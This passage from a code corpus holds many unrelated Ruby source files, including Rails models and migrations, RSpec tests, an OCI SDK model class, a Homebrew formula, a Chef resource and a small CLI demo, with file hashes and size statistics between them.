    # and shared by every document; a lambda makes Mongoid evaluate it
    # per message.
    field :sent, :default => -> { Time.now }
    field :body, :markdown => true

    validates_presence_of :body, :on => :create
  end
end
e82d95ab869070a1f1b65bfb6e1c2c4f53650eaa | 1,289 | # == Schema Information
#
# Table name: admin_users
#
# id :bigint(8) not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0), not null
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_admin_users_on_email (email) UNIQUE
# index_admin_users_on_reset_password_token (reset_password_token) UNIQUE
#
class AdminUser < ApplicationRecord
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable and :omniauthable
  devise :database_authenticatable,
         :recoverable, :rememberable, :trackable, :validatable

  before_update :check_user

  # Forbids an admin from updating any account other than their own.
  # FIX: since Rails 5 a callback returning false no longer halts the
  # chain — the update must be aborted explicitly with throw(:abort).
  def check_user
    return if Current.admin_user.nil?
    return if Current.admin_user.id == id

    errors.add :id, "不能修改其他管理员账号"
    throw :abort
  end
end
1dc4dd9bd29d9600097fcdefcf4c6b60c5ccc304 | 3,329 | #!/usr/bin/env rspec
require 'spec_helper'
require 'mcollective/application/plugin'
# Specs for `mco plugin doc`, covering lookup by bare plugin name and by
# "plugintype/plugin", plus the failure and ambiguity paths.
module MCollective
  class Application
    describe Plugin do
      let(:ddl) { mock }

      before do
        @app = MCollective::Application::Plugin.new()
        @app.configuration[:rpctemplate] = "rspec-helptemplate.erb"
      end

      describe "#doc_command" do
        it "should display doc output for a plugin that exists when using 'plugin'" do
          @app.configuration[:target] = "rspec"
          # Only the agent lookup matches; every other plugin type is empty,
          # so the name is unambiguous.
          PluginManager.stubs(:find).with(:agent, "ddl").returns(["rspec"])
          PluginManager.stubs(:find).with(:aggregate, "ddl").returns([""])
          PluginManager.stubs(:find).with(:data, "ddl").returns([""])
          PluginManager.stubs(:find).with(:discovery, "ddl").returns([""])
          PluginManager.stubs(:find).with(:validator, "ddl").returns([""])
          PluginManager.stubs(:find).with(:connector, "ddl").returns([""])
          @app.stubs(:load_plugin_ddl).with('rspec', :agent).returns(ddl)
          ddl.expects(:help).with("rspec-helptemplate.erb").returns("agent_template")
          @app.expects(:puts).with("agent_template")
          @app.doc_command
        end

        it "should display doc output for a plugin that exists when using 'plugintype/plugin'" do
          @app.configuration[:target] = "agent/rspec"
          @app.stubs(:load_plugin_ddl).with(:rspec, "agent").returns(ddl)
          ddl.expects(:help).with("rspec-helptemplate.erb").returns("agent_template")
          @app.expects(:puts).with("agent_template")
          @app.doc_command
        end

        it "should display a failure message for a plugin that doesn't exist when using 'plugin'" do
          @app.configuration[:target] = "rspec"
          PluginManager.stubs(:find).returns([""])
          # abort is stubbed to raise so the spec can assert it was reached.
          @app.expects(:abort).with("Could not find a plugin named 'rspec' in any supported plugin type").raises("test_error")
          expect{
            @app.doc_command
          }.to raise_error "test_error"
        end

        it "should display a failure message for a plugin that doens't exist when using 'plugintype/plugin'" do
          @app.configuration[:target] = "agent/rspec"
          @app.expects(:load_plugin_ddl).with(:rspec, "agent").returns(nil)
          @app.expects(:abort).with("Could not find a 'agent' plugin named 'rspec'").raises("test_error")
          expect{
            @app.doc_command
          }.to raise_error "test_error"
        end

        it "should display a failure message if duplicate plugins are found" do
          @app.configuration[:target] = "rspec"
          PluginManager.stubs(:find).returns(["rspec"])
          @app.stubs(:abort).with("Duplicate plugin name found, please specify a full path like agent/rpcutil").raises("test_error")
          expect{
            @app.doc_command
          }.to raise_error "test_error"
        end

        it "should display a failure message for a plugintype that doens't exist" do
          @app.configuration[:target] = "foo/rspec"
          @app.stubs(:load_plugin_ddl).with(:rspec, "foo").returns(nil)
          @app.stubs(:abort).with("Could not find a 'foo' plugin named 'rspec'").raises("test_error")
          expect{
            @app.doc_command
          }.to raise_error "test_error"
        end
      end
    end
  end
end
| 40.108434 | 132 | 0.620306 |
1d3f71cfc631d1a7015f3a9a640f83cf2e112136 | 841 | $LOAD_PATH.unshift File.expand_path('lib', __dir__)
require 'stream/version'
Gem::Specification.new do |gem|
  # Gem identity and ownership.
  gem.name = 'stream-ruby'
  gem.description = 'Ruby client for getstream.io service'
  gem.version = Stream::VERSION
  gem.platform = Gem::Platform::RUBY
  gem.summary = 'A gem that provides a client interface for getstream.io'
  gem.email = '[email protected]'
  gem.homepage = 'http://github.com/GetStream/stream-ruby'
  gem.authors = ['Tommaso Barbugli', 'Ian Douglas', 'Federico Ruggi']
  gem.extra_rdoc_files = %w[README.md LICENSE]
  # Ship only the library code; tests and tooling stay out of the gem.
  gem.files = Dir['lib/**/*']
  gem.license = 'BSD-3-Clause'

  gem.required_ruby_version = '>=2.5.0'

  # Runtime dependencies.
  gem.add_dependency 'faraday'
  gem.add_dependency 'jwt'

  # Development-only dependencies.
  gem.add_development_dependency 'rake'
  gem.add_development_dependency 'rspec'
  gem.add_development_dependency 'simplecov'
end
| 36.565217 | 73 | 0.73365 |
6a401187cbff6532a5483c51061b8f4ed49b5144 | 216 | # This migration comes from alchemy (originally 20150729151825)
# Adds an optional custom link text column to Alchemy's EssenceFile contents.
class AddLinkTextToAlchemyEssenceFiles < ActiveRecord::Migration[4.2]
  def change
    add_column :alchemy_essence_files, :link_text, :string
  end
end
| 30.857143 | 69 | 0.805556 |
b92d0ba51f5cd55cb4b24d452f65bfce15a41ae7 | 2,473 | class RemoveLocalAreas < ActiveRecord::Migration
# Drops the legacy areas table.
# NOTE(review): destructive — self.down only rebuilds the schema; the
# rows themselves are not restored.
def self.up
  drop_table :areas
end
# Recreates the areas table with its last known schema so the migration
# is structurally reversible (data is not restored).
def self.down
  create_table "areas", :force => true do |t|
    t.string "country"
    t.float "co2_price"
    t.float "co2_percentage_free"
    t.float "el_import_capacity"
    t.float "el_export_capacity"
    t.float "co2_emission_1990"
    t.float "co2_emission_2009"
    t.float "co2_emission_electricity_1990"
    t.float "residences_roof_surface_available_for_pv"
    t.float "coast_line"
    t.float "offshore_suitable_for_wind"
    t.float "onshore_suitable_for_wind"
    t.float "areable_land"
    t.float "available_land"
    t.datetime "created_at"
    t.datetime "updated_at"
    t.float "land_available_for_solar"
    t.float "km_per_car"
    t.float "import_electricity_primary_demand_factor", :default => 1.82
    t.float "export_electricity_primary_demand_factor", :default => 1.0
    t.float "capacity_buffer_in_mj_s"
    t.float "capacity_buffer_decentral_in_mj_s"
    t.float "km_per_truck"
    t.float "annual_infrastructure_cost_electricity"
    t.float "number_of_residences"
    t.float "number_of_inhabitants"
    t.boolean "use_network_calculations"
    t.boolean "has_coastline"
    t.boolean "has_mountains"
    t.boolean "has_lignite"
    t.float "annual_infrastructure_cost_gas"
    t.string "entity"
    t.float "percentage_of_new_houses"
    t.float "recirculation"
    t.float "heat_recovery"
    t.float "ventilation_rate"
    t.float "market_share_daylight_control"
    t.float "market_share_motion_detection"
    t.float "buildings_heating_share_offices"
    t.float "buildings_heating_share_schools"
    t.float "buildings_heating_share_other"
    t.float "buildings_roof_surface_available_for_pv"
    t.float "insulation_level_existing_houses"
    t.float "insulation_level_new_houses"
    t.float "insulation_level_schools"
    t.float "insulation_level_offices"
    t.boolean "has_buildings"
    t.boolean "has_agriculture", :default => true
    t.integer "current_electricity_demand_in_mj", :limit => 8, :default => 1
    t.boolean "has_solar_csp"
    t.boolean "has_old_technologies"
    t.integer "parent_id"
  end
end
end
| 39.253968 | 90 | 0.648605 |
4a5d8dfbd919ab257473bcaadaed490c3182428e | 2,053 | require 'spec_helper'
describe "Analyzer" do
  # Two members; per-language repo counts and stars used by all examples.
  let(:test_data){ [
    {
      "profile" => {
        "username"=>"aaa"
      },
      "stats" => {
        "Ruby" => {"count"=>5, "star"=>0 },
        "JavaScript" => { "count"=> 1, "star"=>10 }
      }
    },
    {
      "profile" => {
        "username"=>"bbb"
      },
      "stats" => {
        "Ruby" => {"count"=>5, "star"=>10 },
        "C" => { "count"=> 10, "star"=>10 },
        "JavaScript" => { "count"=> 9, "star"=>0 }
      }
    }
  ]}

  # Variant with distinct per-language totals so top_language has a
  # deterministic ordering.
  let(:test_data2){ [
    {
      "profile" => {
        "username"=>"aaa"
      },
      "stats" => {
        "Ruby" => {"count"=>5, "star"=>0 },
        "JavaScript" => { "count"=> 1, "star"=>10 }
      }
    },
    {
      "profile" => {
        "username"=>"bbb"
      },
      "stats" => {
        "Ruby" => {"count"=>1, "star"=>10 },
        "C" => { "count"=> 10, "star"=>10 },
        "JavaScript" => { "count"=> 6, "star"=>0 }
      }
    }
  ]}

  # FIX: removed leftover debug `puts` calls that polluted test output.
  it "calculate sum by language" do
    p = Hubberlyzer::Analyzer.new(test_data)
    sum = p.sum_by_language
    expect(sum["C"]["count"]).to eq(10)
    expect(sum["Ruby"]["count"]).to eq(10)
    expect(sum["JavaScript"]["count"]).to eq(10)
    expect(sum["C"]["star"]).to eq(10)
    expect(sum["Ruby"]["star"]).to eq(10)
    expect(sum["JavaScript"]["star"]).to eq(10)
  end

  it "calculate member's contribution to a language" do
    p = Hubberlyzer::Analyzer.new(test_data)
    sum = p.member_contrib("Ruby", "star")
    expect(sum.length).to eq(2)
    expect(sum[0]["profile"]["username"]).to eq("bbb")
    expect(sum[1]["profile"]["username"]).to eq("aaa")
    expect(sum[0]["star"]).to eq(10)
    expect(sum[1]["star"]).to eq(0)
  end

  it "calculate top x language" do
    p = Hubberlyzer::Analyzer.new(test_data2)
    sum = p.top_language("count", 10)
    expect(sum.length).to eq(3)
    expect(sum[0][0]).to eq("C")
    expect(sum[1][0]).to eq("JavaScript")
    expect(sum[2][0]).to eq("Ruby")
  end
end
189a6f07326a7966bc2810e6234ab8c8102c99fd | 11,608 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require_relative 'external_database_connector'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An Oracle Cloud Infrastructure resource that uses the [Management Agent cloud service (MACS)](https://docs.cloud.oracle.com/iaas/management-agents/index.html) to connect to an external Oracle Database.
#
class Database::Models::ExternalMacsConnector < Database::Models::ExternalDatabaseConnector
# This attribute is required.
# @return [OCI::Database::Models::DatabaseConnectionString]
attr_accessor :connection_string
# This attribute is required.
# @return [OCI::Database::Models::DatabaseConnectionCredentials]
attr_accessor :connection_credentials
# **[Required]** The ID of the agent used for the
# {#create_external_database_connector_details create_external_database_connector_details}.
#
# @return [String]
attr_accessor :connector_agent_id
# Maps each ruby-style (snake_case) attribute name to its JSON
# (camelCase) key.
def self.attribute_map
  {
    compartment_id: :compartmentId,
    freeform_tags: :freeformTags,
    defined_tags: :definedTags,
    display_name: :displayName,
    id: :id,
    lifecycle_state: :lifecycleState,
    lifecycle_details: :lifecycleDetails,
    time_created: :timeCreated,
    connector_type: :connectorType,
    external_database_id: :externalDatabaseId,
    connection_status: :connectionStatus,
    time_connection_status_last_updated: :timeConnectionStatusLastUpdated,
    connection_string: :connectionString,
    connection_credentials: :connectionCredentials,
    connector_agent_id: :connectorAgentId
  }
end
# Maps each ruby-style attribute name to its declared swagger type,
# expressed as a symbol.
def self.swagger_types
  {
    compartment_id: :'String',
    freeform_tags: :'Hash<String, String>',
    defined_tags: :'Hash<String, Hash<String, Object>>',
    display_name: :'String',
    id: :'String',
    lifecycle_state: :'String',
    lifecycle_details: :'String',
    time_created: :'DateTime',
    connector_type: :'String',
    external_database_id: :'String',
    connection_status: :'String',
    time_connection_status_last_updated: :'DateTime',
    connection_string: :'OCI::Database::Models::DatabaseConnectionString',
    connection_credentials: :'OCI::Database::Models::DatabaseConnectionCredentials',
    connector_agent_id: :'String'
  }
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :compartment_id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#compartment_id #compartment_id} proprety
# @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#freeform_tags #freeform_tags} proprety
# @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#defined_tags #defined_tags} proprety
# @option attributes [String] :display_name The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#display_name #display_name} proprety
# @option attributes [String] :id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#id #id} proprety
# @option attributes [String] :lifecycle_state The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#lifecycle_state #lifecycle_state} proprety
# @option attributes [String] :lifecycle_details The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#lifecycle_details #lifecycle_details} proprety
# @option attributes [DateTime] :time_created The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#time_created #time_created} proprety
# @option attributes [String] :external_database_id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#external_database_id #external_database_id} proprety
# @option attributes [String] :connection_status The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#connection_status #connection_status} proprety
# @option attributes [DateTime] :time_connection_status_last_updated The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#time_connection_status_last_updated #time_connection_status_last_updated} proprety
# @option attributes [OCI::Database::Models::DatabaseConnectionString] :connection_string The value to assign to the {#connection_string} property
# @option attributes [OCI::Database::Models::DatabaseConnectionCredentials] :connection_credentials The value to assign to the {#connection_credentials} property
# @option attributes [String] :connector_agent_id The value to assign to the {#connector_agent_id} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['connectorType'] = 'MACS'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.connection_string = attributes[:'connectionString'] if attributes[:'connectionString']
raise 'You cannot provide both :connectionString and :connection_string' if attributes.key?(:'connectionString') && attributes.key?(:'connection_string')
self.connection_string = attributes[:'connection_string'] if attributes[:'connection_string']
self.connection_credentials = attributes[:'connectionCredentials'] if attributes[:'connectionCredentials']
raise 'You cannot provide both :connectionCredentials and :connection_credentials' if attributes.key?(:'connectionCredentials') && attributes.key?(:'connection_credentials')
self.connection_credentials = attributes[:'connection_credentials'] if attributes[:'connection_credentials']
self.connector_agent_id = attributes[:'connectorAgentId'] if attributes[:'connectorAgentId']
raise 'You cannot provide both :connectorAgentId and :connector_agent_id' if attributes.key?(:'connectorAgentId') && attributes.key?(:'connector_agent_id')
self.connector_agent_id = attributes[:'connector_agent_id'] if attributes[:'connector_agent_id']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
compartment_id == other.compartment_id &&
freeform_tags == other.freeform_tags &&
defined_tags == other.defined_tags &&
display_name == other.display_name &&
id == other.id &&
lifecycle_state == other.lifecycle_state &&
lifecycle_details == other.lifecycle_details &&
time_created == other.time_created &&
connector_type == other.connector_type &&
external_database_id == other.external_database_id &&
connection_status == other.connection_status &&
time_connection_status_last_updated == other.time_connection_status_last_updated &&
connection_string == other.connection_string &&
connection_credentials == other.connection_credentials &&
connector_agent_id == other.connector_agent_id
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[compartment_id, freeform_tags, defined_tags, display_name, id, lifecycle_state, lifecycle_details, time_created, connector_type, external_database_id, connection_status, time_connection_status_last_updated, connection_string, connection_credentials, connector_agent_id].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 48.773109 | 281 | 0.714938 |
f843d76f7af3b0f7637453efbb723cecb6866230 | 3,691 | class Libeemd < Formula
desc "Library for performing the ensemble empirical mode decomposition"
homepage "https://bitbucket.org/luukko/libeemd"
url "https://bitbucket.org/luukko/libeemd/get/v1.4.tar.gz"
sha256 "c484f4287f4469f3ac100cf4ecead8fd24bf43854efa63650934dd698d6b298b"
head "https://bitbucket.org/luukko/libeemd.git"
# doi "10.1007/s00180-015-0603-9"
bottle do
cellar :any
sha256 "071ec8487eb593553d0afe62e14f53f7c9c533922e520015e3bfee9f90b152cb" => :sierra
sha256 "58ca938d5577cdedc26943d7badcdfe6c86a6e3710b0022bb9a4bdf74d6c1acb" => :el_capitan
sha256 "003419ec5ee70b9b7aa3606b4e3199e9a6427cd20689db6995519cb0a0a38d23" => :yosemite
sha256 "599aa4e28bfe2136a38b3289d5254189091f856fb0d48ebf40fafaf1d578c0cb" => :x86_64_linux
end
depends_on "gsl"
depends_on "pkg-config" => :build
needs :openmp
# The patch fixes the Makefile build option to use the -dynamiclib
# option instead of the -shared option when making a macOS dynamic
# link library and also fixes the dynamic link library suffix name
# to follow the name convention used in macOS. Since the original
# Makefile does not support multi-platform configuration, we handle
# this with a local patch until the original author switches to use
# autoconf or some other flexible build environment adaptation
# tools.
patch :DATA
def install
system "make"
system "make", "install", "PREFIX=#{prefix}"
end
test do
(testpath/"test.c").write <<~EOS
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <gsl/gsl_math.h>
#include <eemd.h>
const size_t ensemble_size = 250;
const unsigned int S_number = 4;
const unsigned int num_siftings = 50;
const double noise_strength = 0.2;
const unsigned long int rng_seed = 0;
const size_t N = 1024;
static inline double input_signal(double x) {
const double omega = 2*M_PI/(N-1);
return sin(17*omega*x)+0.5*(1.0-exp(-0.002*x))*sin(51*omega*x+1);
}
int main(void) {
libeemd_error_code err;
double* inp = malloc(N*sizeof(double));
for (size_t i=0; i<N; i++) {
inp[i] = input_signal((double)i);
}
size_t M = emd_num_imfs(N);
double* outp = malloc(M*N*sizeof(double));
err = eemd(inp, N, outp, M, ensemble_size, noise_strength,
S_number, num_siftings, rng_seed);
if (err != EMD_SUCCESS) {
return -1;
}
return 0;
}
EOS
system ENV.cc, "test.c", "-I#{include}", "-L#{lib}", "-leemd", "-o", "test"
system "./test"
end
end
__END__
--- a/Makefile 2016-09-19 16:58:13.000000000 +0900
+++ b/Makefile 2016-12-08 11:50:50.000000000 +0900
@@ -23,7 +23,7 @@
endef
export uninstall_msg
-all: libeemd.so.$(version) libeemd.a eemd.h
+all: libeemd.$(version).dylib libeemd.a eemd.h
clean:
rm -f libeemd.so libeemd.so.$(version) libeemd.a eemd.h obj/eemd.o
@@ -34,8 +34,8 @@
install -d $(PREFIX)/lib
install -m644 eemd.h $(PREFIX)/include
install -m644 libeemd.a $(PREFIX)/lib
- install libeemd.so.$(version) $(PREFIX)/lib
- cp -Pf libeemd.so $(PREFIX)/lib
+ install libeemd.$(version).dylib $(PREFIX)/lib
+ cp -Pf libeemd.dylib $(PREFIX)/lib
uninstall:
@echo "$$uninstall_msg"
@@ -49,9 +49,9 @@
libeemd.a: obj/eemd.o
$(AR) rcs $@ $^
-libeemd.so.$(version): src/eemd.c src/eemd.h
- gcc $(commonflags) $< -fPIC -shared -Wl,$(SONAME),$@ $(gsl_flags) -o $@
- ln -sf $@ libeemd.so
+libeemd.$(version).dylib: src/eemd.c src/eemd.h
+ gcc $(commonflags) $< -fPIC -dynamiclib -Wl,$(SONAME),$@ $(gsl_flags) -o $@
+ ln -sf $@ libeemd.dylib
eemd.h: src/eemd.h
cp $< $@
| 32.095652 | 94 | 0.663777 |
7ad24790754aa4e8210ad256e11d2a29103a8f7b | 1,013 | json.key_format!(camelize: :lower)
# Serializes the Pageflow configuration for the editor frontend.
# Simple scalar settings are copied straight off the config object.
json.call(Pageflow.config,
          :confirm_encoding_jobs,
          :available_locales,
          :available_public_locales,
          :available_text_track_kinds,
          :available_share_providers)

# Registered file types, including one level of nested file types.
json.file_types Pageflow.config.file_types do |file_type|
  json.collection_name file_type.collection_name
  json.top_level_type file_type.top_level_type
  json.type_name file_type.type_name
  json.param_key file_type.param_key
  json.i18n_key file_type.i18n_key
  json.nested_file_types file_type.nested_file_types do |nested_file_type|
    json.collection_name nested_file_type.collection_name
  end
end

# Default meta tags applied to published entries.
json.default_author_meta_tag Pageflow.config.default_author_meta_tag
json.default_publisher_meta_tag Pageflow.config.default_publisher_meta_tag
json.default_keywords_meta_tag Pageflow.config.default_keywords_meta_tag

json.themes(Pageflow.config.themes, :name, :preview_image_path)

json.edit_lock_polling_interval_in_seconds Pageflow.config.edit_lock_polling_interval
391f462298dc0fe3c4e331424c551a6dbfa721cb | 1,956 | class Location
include Mongoid::Document
include Mongoid::Timestamps
include Mongoid::Ancestry
include Resourceable
field :resource_owner_id, type: Moped::BSON::ObjectId
field :name
field :type, default: 'generic'
field :device_ids, type: Array, default: []
index({ resource_owner_id: 1 }, { background: true })
index({ type: 1 }, { background: true })
index({ name: 1 }, { background: true })
index({ device_ids: 1 }, { background: true })
attr_accessor :into, :locations, :devices
attr_protected :resource_owner_id, :location_ids, :device_ids, :updated_at
has_ancestry orphan_strategy: :rootify
validates :resource_owner_id, presence: true
validates :name, presence: true
validates :type, presence: true, inclusion: { in: Settings.locations.types }
validates :into, uri: { allow_nil: true }, owned: true
validates :locations, uri: true, owned: true
validates :devices, uri: true, owned: true
before_update :move_children_to_root
before_save :set_parent_id, :set_device_ids
after_save :set_location_ids
after_save :touch_ancestors, :touch_children
def active_model_serializer; LocationSerializer; end
def children_devices
children.map(&:device_ids).flatten
end
def descendants_devices
descendants.map(&:device_ids).flatten
end
private
def set_parent_id
self.parent_id = find_id(into) if into
end
def set_location_ids
Location.in(id: find_ids(locations)).each { |l| l.update_attributes(parent_id: self.id) } if locations
end
def set_device_ids
self.device_ids = find_ids(devices).map{|id| Moped::BSON::ObjectId(id) } if devices
end
def move_children_to_root
children.each { |l| l.update_attributes(parent_id: nil) } if locations
end
def touch_ancestors
ancestors.update_all(updated_at: Time.now) if name_changed?
end
def touch_children
descendants.update_all(updated_at: Time.now) if name_changed?
end
end
| 27.942857 | 106 | 0.731595 |
ff5c0e30c82dbb03f8d9b5a5b0361977fb067349 | 154 | module Ahoy
class Message < ActiveRecord::Base
self.table_name = "ahoy_messages"
belongs_to :user, polymorphic: true, optional: true
end
end
| 19.25 | 55 | 0.727273 |
08f6226a333e7ae000e9018a79f2b4ce0a5731d8 | 1,268 | $:.unshift File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib')
require 'luban/cli'
# Demo CLI built on Luban::CLI: greets a named person in one of the
# supported languages, optionally echoing the parsed options/arguments.
class HelloApp < Luban::CLI::Application
  # Greeting word per supported language.
  HelloTexts = { english: 'Hello', french: 'Bonjour',
                 german: 'Halo', italian: 'Ciao',
                 chinese: '您好', japanese: 'こんにちは',
                 korean: '안녕하세요' }
  # Valid values for the --lang option.
  Languages = HelloTexts.keys

  configure do
    # program "hello"
    version '1.0.0'
    desc "Say hello to someone"
    long_desc "Demo app for Luban::CLI"
    option :lang, "Language to say hello", short: :l,
           type: :symbol, default: :english, within: Languages
    switch :verbose, "Run in verbose mode", short: :V
    argument :name, "Name to say hello"
    action :say_hello
  end

  # Action handler wired up via `action :say_hello` in the configure block.
  # Dispatches to the verbose printer when --verbose was given.
  def say_hello(args:, opts:)
    greeting = HelloTexts[opts[:lang]]
    recipient = args[:name]
    return say_hello_verbosely(greeting, recipient, opts, args) if opts[:verbose]

    say_hello_concisely(greeting, recipient)
  end

  protected

  # Dumps the parsed options and arguments, then greets.
  def say_hello_verbosely(hello_text, name, opts, args)
    puts "Options: #{opts.inspect}"
    puts "Arguments: #{args.inspect}"
    say_hello_concisely(hello_text, name)
  end

  # Prints the greeting itself.
  def say_hello_concisely(hello_text, name)
    puts "#{hello_text}, #{name}!"
  end
end

HelloApp.new.run
1cac2bf68a174cd01e3b64db56a2bca7b5205c10 | 1,816 | class BatchCompareService < ApplicationService
attr_reader :datasets, :hierarchy
def initialize(options = {
datasets: [NBS::NewbornRecord.all, OVRS::NewbornRecord.all],
hierarchy: CsvRecord::FIELD_HIERARCHY,
requestor: 'system'
})
raise ArgumentError unless options[:datasets].length == 2
@datasets = options[:datasets]
@hierarchy = options[:hierarchy]
@requestor = options[:requestor]
end
def call!
Report.new requestor: @requestor,
data: {
conflicts: conflicts,
nbs: datasets.first,
ovrs: datasets.second
},
type: 'DiscrepancyReport'
end
private
def choose_id(*records)
uuid_regex = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/ # rubocop:disable Metrics/LineLength
ids = records.map(&:id).compact
without_uuid = ids.reject { |id| uuid_regex.match?(id) }
without_uuid.empty? ? ids.first : without_uuid.first
end
def compare(record, other)
difference = record.attributes.to_a - other.attributes.to_a
Hash[*difference.flatten]
end
def conflicts
conflict_hash.to_a.map do |id, fields|
{
id: id,
nbs: NBS::NewbornRecord.find_or_match(id, OVRS::NewbornRecord).try(:attributes),
ovrs: OVRS::NewbornRecord.find_or_match(id, NBS::NewbornRecord).try(:attributes),
fields: fields
}
end
end
def conflict_hash
hash = Hash.new { |h, k| h[k] = Set.new }
datasets.permutation.each do |control, other|
control.each do |record|
linked = record.match other
diffs = linked ? compare(record, linked) : {}
diffs.each_key { |prop| hash[choose_id(record, linked)].add(prop) }
end
end
hash
end
end
| 29.290323 | 129 | 0.618943 |
f73feb04861e3eb083397fdc26af780fd52cf250 | 2,319 | #
# Author:: Seth Chisamore (<[email protected]>)
# Author:: Lamont Granquist (<[email protected]>)
# Author:: Marco Betti (<[email protected]>)
# Copyright:: Copyright (c) 2011 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require File.join(File.dirname(__FILE__), 'resource_database_user')
require File.join(File.dirname(__FILE__), 'provider_database_postgresql_user')
class Chef
  class Resource
    # Chef resource describing a PostgreSQL database user/role. Behaves like
    # Chef::Resource::DatabaseUser plus the PostgreSQL-specific role flags
    # and an optional schema name for :grant_schema.
    class PostgresqlDatabaseUser < Chef::Resource::DatabaseUser
      def initialize(name, run_context = nil)
        super
        @resource_name = :postgresql_database_user
        @provider = Chef::Provider::Database::PostgresqlUser
        # Role-flag defaults.
        @createdb = false
        @createrole = false
        @login = true
        @replication = false
        @superuser = false
        @schema_name = nil
        @allowed_actions.push(:create, :drop, :grant, :grant_schema)
      end

      # The five boolean role flags share identical accessor semantics
      # (get-or-set, restricted to true/false), so generate them instead of
      # spelling each one out.
      %i[createdb createrole login replication superuser].each do |flag|
        define_method(flag) do |arg = nil|
          set_or_return(flag, arg, equal_to: [true, false])
        end
      end

      # Schema to operate on; must be a String when given.
      def schema_name(arg = nil)
        set_or_return(
          :schema_name,
          arg,
          kind_of: String
        )
      end
    end
  end
end
33a28f1eefbb759d25cf6e30b6bce0c31f2eb92d | 190 | # frozen_string_literal: true
# Adds an ideas.assigned_user_id reference column. The foreign key points at
# the users table explicitly (to_table) because the association name
# (assigned_user) differs from the target table name.
class AddAssignedUserToIdeas < ActiveRecord::Migration[5.2]
  def change
